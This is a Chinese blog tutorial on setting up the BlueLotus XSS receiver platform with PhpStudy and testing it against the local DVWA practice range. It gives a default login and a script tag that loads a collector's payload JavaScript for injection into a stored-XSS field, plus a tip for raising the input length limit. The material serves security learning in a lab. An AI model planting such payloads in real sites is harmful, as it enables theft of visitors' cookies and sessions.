XSS 进阶篇:一文全面了解蓝莲花基本用法

数据来源 

        本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。

xss漏洞接收平台 - 蓝莲花:GitHub - firesunCN/BlueLotus_XSSReceiver 

1)下载并安装Phpstudy(安装过程可以一路下一步,也可以改安装路径)    http://public.xp.cn/upgrades/PhpStudy2018.zip 

        安装完成后启动服务

        2)将解压后的BlueLotus_XSSReceiver原代码放置 phpstudy 安装目录的WWW文件夹

3) 在浏览器中输入:http://127.0.0.1/BlueLotus_XSSReceiver    #  访问我们刚才拉到www文件夹下的BlueLotus_XSSReceiver文件,进入安装界面(注意:win7虚拟机安装后的蓝莲花平台界面显示不全,我这里只是用来演示安装过程,建议在windows10以上安装)

 这里输入刚才我们的登录密码进行登录操作: bluelotus

 4)配置XSS接收平台 - 蓝莲花

// 如果你的平台的文件名跟我的一样是BlueLotus_XSSReceiver就直接复制粘贴,不是就把这个名称改成自己的
http://127.0.0.1/BlueLotus_XSSReceiver/index.php

然后在这句前端代码复制保存下来,等下要用

<script src="http://127.0.0.1/BlueLotus_XSSReceiver/myjs/text.js"></script>

5)测试XSS接收平台是否配置成功了(我这里用DVWA靶场测试,攻击他人网站是犯法的)

打开我们本地的DVWA靶场,把安全等级调低然后选择XSS存储

        但是到这里你就会发现我们粘贴的连接没有显示完整,这是因为前端开发人员在写这个页面时给这个留言框添加了字数限制,把限制调大就好

最后切换回XSS的接收平台蓝莲花 

生成JS文件时选择的模板不同接收到的信息也会不同 

XSS绕过

XSS防御

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

技术探索

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值